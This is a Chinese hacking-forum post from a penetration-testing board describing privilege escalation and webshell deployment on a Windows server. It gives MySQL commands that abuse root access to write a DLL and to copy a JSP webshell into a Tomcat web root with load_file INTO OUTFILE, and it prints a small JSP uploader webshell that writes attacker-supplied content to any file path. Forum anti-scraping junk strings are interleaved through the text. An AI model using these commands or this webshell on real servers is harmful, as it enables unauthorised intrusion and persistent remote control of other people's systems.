找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 解决Win下MySQL root导出Webshell换行符问题
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2370|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。
/ K- q/ T- P) B; Y
& c  v5 s6 i8 K+ C# s- s  U2 s首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php
) E7 [! x9 ?& z7 S  @安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)2 n1 |& |7 Z8 ^* y3 C, P
提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了
: [3 T; Q4 Y+ |! i1 j5 O1 show variables like '%plugin%';
8 w# T) {: d' |3 Y+ f后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功
/ Z( A9 I% w2 |- g" h3 ^创建自定义函数似乎被拦截,一直失败。
5 k6 |5 D! m1 t' g& K1 V0 m后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限
. D& U- I% }* c7 K2 s测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp
- l3 s: e3 b1 T; A6 i) O. j用mysql执行语句:
" ^& X" N* ^: O# e: H8 g1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'
5 o) O; V! {: a7 I) O2 复制代码
5 [6 v' a- w# ^后成功。8 [' Q  F0 k: u/ m0 z# m. M. m
但是访问后得到如下提示:
+ l6 r+ U5 e8 O, o​500页面
6 Y6 `$ Y8 O% }; }5 j. L5 K# G9 D5 E

2 C( J' ?) d( P. b1 [( K明显是MySQL的Win下版本自动添加转义符\n\r了
+ J/ Z" a1 g/ m4 m2 p! K* a' D/ E0 R这样导致程序运行的悲剧。2 u5 o+ Y, v/ ]/ p5 c
从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。" p: V0 e5 z9 v
最后弄了这么个小脚本:3 j9 U, K- B2 A2 h8 r% t
01 <%@ page language="java" pageEncoding="gbk"%>
- a. v7 T7 G1 W) _' X02 <jsp:directive.page import="java.io.File"/>- W! _2 q6 ^8 X! {
03 <jsp:directive.page import="java.io.OutputStream"/>5 s; D- x  S% {
04 <jsp:directive.page import="java.io.FileOutputStream"/>
+ T2 E& W8 |7 A) h) N' a" O05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>) C1 j" ]3 v* [; R
06 error www.2cto.com
* ~, b$ O/ X& X! p% D: k+ }6 d07 <%}}if(i==0){%>
% p/ A$ t" U- p$ T, M5 I08 ok7 x2 V+ z! \7 `4 Z9 J8 K2 n
09 <%}%>
& z0 ^' L. H, s/ O% R  d10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">
8 F  x& u% M7 s5 Z就可以避免转义符让JSP的马儿运行500错误了。
  p5 I/ U* H1 {! N! V$ S
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表